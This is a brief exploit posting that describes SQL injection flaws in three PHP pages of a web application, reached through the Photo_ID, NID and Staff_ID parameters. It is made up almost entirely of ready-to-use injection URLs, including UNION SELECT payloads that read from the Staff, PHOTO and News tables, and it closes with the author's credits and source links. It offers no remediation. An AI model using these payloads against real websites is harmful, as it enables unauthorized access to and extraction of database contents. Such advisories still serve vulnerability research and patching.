Sql injection
1,photo_enlarged.php file Photo_ID parameter
2,newsdetail.php file NID parameter
3,staff_photo_enlarged.php file Staff_ID parameter
http://website/photo_enlarged.php?Photo_ID='sql
http://website/newsdetail.php?NID='sql
http://website/staff_photo_enlarged.php?Staff_ID='sql
Example:
http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,6+from+Staff
http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,1+from+PHOTO
http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News
Credit:Liz0ziM
E-mail:[email protected]
Site:www.biyo.tk www.biyosecurity.be
Greeatz:My All Friend
Google:
Source:
http://www.blogcu.com/Liz0ziM/714903/
http://liz0zim.no-ip.org/cline.txt
http://biyosecurity.be/bugs/cline.txt